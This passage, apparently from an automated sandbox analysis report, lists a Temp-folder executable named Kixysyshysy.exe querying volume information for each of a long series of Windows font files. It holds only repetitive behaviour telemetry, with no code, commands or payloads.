Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
